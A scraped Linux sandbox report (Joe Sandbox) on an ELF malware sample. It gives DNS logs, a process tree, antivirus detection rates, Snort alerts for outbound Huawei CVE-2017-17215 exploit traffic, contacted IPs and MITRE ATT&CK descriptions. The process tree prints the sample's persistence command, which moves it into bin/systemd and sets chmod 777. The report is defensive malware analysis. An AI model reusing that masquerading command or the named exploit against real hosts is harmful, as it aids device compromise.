Mar 20, 2023 18:15:46.917658091 CET	8.8.8.8	192.168.2.23	0x5787	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.937635899 CET	8.8.8.8	192.168.2.23	0x5787	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.958277941 CET	8.8.8.8	192.168.2.23	0x5787	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:46.976480007 CET	8.8.8.8	192.168.2.23	0x5787	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:51.995114088 CET	8.8.8.8	192.168.2.23	0xf25e	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.015002966 CET	8.8.8.8	192.168.2.23	0xf25e	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.033480883 CET	8.8.8.8	192.168.2.23	0xf25e	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.051573038 CET	8.8.8.8	192.168.2.23	0xf25e	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:52.071703911 CET	8.8.8.8	192.168.2.23	0xf25e	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.091957092 CET	8.8.8.8	192.168.2.23	0xd197	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.110070944 CET	8.8.8.8	192.168.2.23	0xd197	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.128191948 CET	8.8.8.8	192.168.2.23	0xd197	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.146547079 CET	8.8.8.8	192.168.2.23	0xd197	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:15:55.164916039 CET	8.8.8.8	192.168.2.23	0xd197	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.185120106 CET	8.8.8.8	192.168.2.23	0xf829	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.205375910 CET	8.8.8.8	192.168.2.23	0xf829	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.223678112 CET	8.8.8.8	192.168.2.23	0xf829	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.243460894 CET	8.8.8.8	192.168.2.23	0xf829	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:00.261671066 CET	8.8.8.8	192.168.2.23	0xf829	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.281678915 CET	8.8.8.8	192.168.2.23	0x7773	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.299808025 CET	8.8.8.8	192.168.2.23	0x7773	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.317961931 CET	8.8.8.8	192.168.2.23	0x7773	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.337897062 CET	8.8.8.8	192.168.2.23	0x7773	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:10.355783939 CET	8.8.8.8	192.168.2.23	0x7773	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.373778105 CET	8.8.8.8	192.168.2.23	0x13a6	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.391407967 CET	8.8.8.8	192.168.2.23	0x13a6	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.409384012 CET	8.8.8.8	192.168.2.23	0x13a6	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.427515030 CET	8.8.8.8	192.168.2.23	0x13a6	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:19.445725918 CET	8.8.8.8	192.168.2.23	0x13a6	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.465395927 CET	8.8.8.8	192.168.2.23	0xd685	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.483481884 CET	8.8.8.8	192.168.2.23	0xd685	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.501699924 CET	8.8.8.8	192.168.2.23	0xd685	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.519619942 CET	8.8.8.8	192.168.2.23	0xd685	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:29.539716005 CET	8.8.8.8	192.168.2.23	0xd685	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.558115005 CET	8.8.8.8	192.168.2.23	0x3f01	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.576301098 CET	8.8.8.8	192.168.2.23	0x3f01	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.596678019 CET	8.8.8.8	192.168.2.23	0x3f01	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.616626978 CET	8.8.8.8	192.168.2.23	0x3f01	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:35.634768963 CET	8.8.8.8	192.168.2.23	0x3f01	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.652662039 CET	8.8.8.8	192.168.2.23	0x958a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.670453072 CET	8.8.8.8	192.168.2.23	0x958a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.690440893 CET	8.8.8.8	192.168.2.23	0x958a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.710419893 CET	8.8.8.8	192.168.2.23	0x958a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false
Mar 20, 2023 18:16:44.728445053 CET	8.8.8.8	192.168.2.23	0x958a	Name error (3)	BC@^]B	none	none	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: 6lqMB7o2Ts.elf PID: 6230, Parent PID: 6125

General

Start time:	18:14:39
Start date:	20/03/2023
Path:	/tmp/6lqMB7o2Ts.elf
Arguments:	/tmp/6lqMB7o2Ts.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: 6lqMB7o2Ts.elf PID: 6232, Parent PID: 6230

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/tmp/6lqMB7o2Ts.elf
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: sh PID: 6232, Parent PID: 6230

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/bin/sh
Arguments:	sh -c "rm -rf bin/systemd && mkdir bin; >bin/systemd && mv /tmp/6lqMB7o2Ts.elf bin/systemd; chmod 777 bin/systemd"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: sh PID: 6234, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: rm PID: 6234, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/usr/bin/rm
Arguments:	rm -rf bin/systemd
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Analysis Process: sh PID: 6235, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: mkdir PID: 6235, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/usr/bin/mkdir
Arguments:	mkdir bin
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Analysis Process: sh PID: 6236, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: mv PID: 6236, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/usr/bin/mv
Arguments:	mv /tmp/6lqMB7o2Ts.elf bin/systemd
File size:	149888 bytes
MD5 hash:	504f0590fa482d4da070a702260e3716

Analysis Process: sh PID: 6237, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: chmod PID: 6237, Parent PID: 6232

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/usr/bin/chmod
Arguments:	chmod 777 bin/systemd
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Analysis Process: 6lqMB7o2Ts.elf PID: 6238, Parent PID: 6230

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/tmp/6lqMB7o2Ts.elf
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: 6lqMB7o2Ts.elf PID: 6240, Parent PID: 6238

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/tmp/6lqMB7o2Ts.elf
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Analysis Process: 6lqMB7o2Ts.elf PID: 6241, Parent PID: 6238

General

Start time:	18:14:40
Start date:	20/03/2023
Path:	/tmp/6lqMB7o2Ts.elf
Arguments:	n/a
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Source: 6lqMB7o2Ts.elf	ReversingLabs: Detection: 58%
Source: 6lqMB7o2Ts.elf	Virustotal: Detection: 60%			Perma Link

Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45516 -> 77.136.237.160:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41076 -> 41.238.196.116:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50306 -> 103.54.44.133:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46544 -> 104.128.127.228:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45438 -> 34.120.131.8:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55228 -> 94.187.108.185:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52002 -> 191.61.26.79:37215
Source: Traffic	Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58734 -> 41.239.25.98:37215

Source: global traffic	TCP traffic: 197.58.58.97 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 77.136.237.160 ports 1,2,3,5,7,37215

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: unknown	TCP traffic detected without corresponding DNS query: 197.177.188.105
Source: unknown	TCP traffic detected without corresponding DNS query: 41.59.173.161
Source: unknown	TCP traffic detected without corresponding DNS query: 157.84.173.102
Source: unknown	TCP traffic detected without corresponding DNS query: 157.172.201.119
Source: unknown	TCP traffic detected without corresponding DNS query: 41.88.124.244
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.113.162
Source: unknown	TCP traffic detected without corresponding DNS query: 41.240.223.204
Source: unknown	TCP traffic detected without corresponding DNS query: 197.159.13.122
Source: unknown	TCP traffic detected without corresponding DNS query: 41.187.14.3
Source: unknown	TCP traffic detected without corresponding DNS query: 157.109.52.196
Source: unknown	TCP traffic detected without corresponding DNS query: 41.28.198.60
Source: unknown	TCP traffic detected without corresponding DNS query: 157.48.46.102
Source: unknown	TCP traffic detected without corresponding DNS query: 41.213.200.22
Source: unknown	TCP traffic detected without corresponding DNS query: 157.108.205.143
Source: unknown	TCP traffic detected without corresponding DNS query: 148.94.3.83
Source: unknown	TCP traffic detected without corresponding DNS query: 197.37.53.79
Source: unknown	TCP traffic detected without corresponding DNS query: 157.156.162.199
Source: unknown	TCP traffic detected without corresponding DNS query: 157.205.17.4
Source: unknown	TCP traffic detected without corresponding DNS query: 41.173.117.4
Source: unknown	TCP traffic detected without corresponding DNS query: 197.35.113.47
Source: unknown	TCP traffic detected without corresponding DNS query: 41.18.245.29
Source: unknown	TCP traffic detected without corresponding DNS query: 41.91.82.148
Source: unknown	TCP traffic detected without corresponding DNS query: 157.249.225.91
Source: unknown	TCP traffic detected without corresponding DNS query: 157.38.65.127
Source: unknown	TCP traffic detected without corresponding DNS query: 153.6.146.12
Source: unknown	TCP traffic detected without corresponding DNS query: 41.165.42.202
Source: unknown	TCP traffic detected without corresponding DNS query: 221.4.37.244
Source: unknown	TCP traffic detected without corresponding DNS query: 207.233.206.196
Source: unknown	TCP traffic detected without corresponding DNS query: 76.155.143.172
Source: unknown	TCP traffic detected without corresponding DNS query: 41.85.67.18
Source: unknown	TCP traffic detected without corresponding DNS query: 197.222.143.196
Source: unknown	TCP traffic detected without corresponding DNS query: 41.115.11.233
Source: unknown	TCP traffic detected without corresponding DNS query: 157.60.205.239
Source: unknown	TCP traffic detected without corresponding DNS query: 197.100.148.206
Source: unknown	TCP traffic detected without corresponding DNS query: 62.145.68.134
Source: unknown	TCP traffic detected without corresponding DNS query: 197.228.77.157
Source: unknown	TCP traffic detected without corresponding DNS query: 180.9.6.101
Source: unknown	TCP traffic detected without corresponding DNS query: 61.98.120.1
Source: unknown	TCP traffic detected without corresponding DNS query: 197.20.252.229
Source: unknown	TCP traffic detected without corresponding DNS query: 38.159.96.79
Source: unknown	TCP traffic detected without corresponding DNS query: 157.227.185.30
Source: unknown	TCP traffic detected without corresponding DNS query: 197.0.84.190
Source: unknown	TCP traffic detected without corresponding DNS query: 197.177.127.55
Source: unknown	TCP traffic detected without corresponding DNS query: 197.88.204.252
Source: unknown	TCP traffic detected without corresponding DNS query: 197.95.151.221
Source: unknown	TCP traffic detected without corresponding DNS query: 41.149.105.154
Source: unknown	TCP traffic detected without corresponding DNS query: 197.89.253.13
Source: unknown	TCP traffic detected without corresponding DNS query: 197.25.121.167
Source: unknown	TCP traffic detected without corresponding DNS query: 197.6.247.30
Source: unknown	TCP traffic detected without corresponding DNS query: 157.33.174.150

Source: 6lqMB7o2Ts.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 6lqMB7o2Ts.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report 6lqMB7o2Ts.elf

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: 6lqMB7o2Ts.elf PID: 6230, Parent PID: 6125

General

Analysis Process: 6lqMB7o2Ts.elf PID: 6232, Parent PID: 6230

General

Analysis Process: sh PID: 6232, Parent PID: 6230

General

Analysis Process: sh PID: 6234, Parent PID: 6232

General

Analysis Process: rm PID: 6234, Parent PID: 6232

General

Analysis Process: sh PID: 6235, Parent PID: 6232

General

Analysis Process: mkdir PID: 6235, Parent PID: 6232

General

Analysis Process: sh PID: 6236, Parent PID: 6232

Linux Analysis Report
6lqMB7o2Ts.elf